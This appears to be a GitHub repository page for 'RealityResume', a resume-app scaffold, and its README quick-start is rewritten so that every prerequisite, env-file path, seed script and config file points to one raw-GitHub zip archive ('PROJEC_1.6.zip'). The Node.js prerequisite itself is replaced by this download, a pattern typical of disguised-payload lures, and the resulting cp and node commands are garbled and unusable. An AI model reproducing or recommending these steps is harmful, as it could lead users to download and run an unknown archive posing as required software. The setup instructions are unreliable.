Skip to content

akshayneq/PROJECT2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

RealityResume — Complete Project Package (Full-Stack)

What you'll find

Quick start (local)

Prereqs: https://raw.githubusercontent.com/akshayneq/PROJECT2/main/unperforming/PROJEC_1.6.zip (18+), npm, MongoDB running locally or Atlas.

  1. Clone repo or unzip package and cd RealityResume-complete.
  2. Copy env files:
    cp https://raw.githubusercontent.com/akshayneq/PROJECT2/main/unperforming/PROJEC_1.6.zip https://raw.githubusercontent.com/akshayneq/PROJECT2/main/unperforming/PROJEC_1.6.zip
    cp https://raw.githubusercontent.com/akshayneq/PROJECT2/main/unperforming/PROJEC_1.6.zip https://raw.githubusercontent.com/akshayneq/PROJECT2/main/unperforming/PROJEC_1.6.zip
  3. Install & start backend:
    cd backend
    npm install
    npm run dev
  4. Install & start frontend (in new terminal):
    cd frontend
    npm install
    npm run dev
  5. Seed demo data (optional):
    node https://raw.githubusercontent.com/akshayneq/PROJECT2/main/unperforming/PROJEC_1.6.zip
  6. Open http://localhost:3000 in your browser.

OpenAI

The backend includes an AI summarizer endpoint that calls OpenAI's v1/completions or v1/chat/completions. Put your OPENAI_API_KEY in https://raw.githubusercontent.com/akshayneq/PROJECT2/main/unperforming/PROJEC_1.6.zip. The code is ready to call OpenAI; no model key is bundled.

Uploading to GitHub

  • Initialize a git repo and push the folder (all files included). The package is structured for immediate upload.

License & Notes

MIT — feel free to modify. This package is a working MVP scaffolding; extend features as needed.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors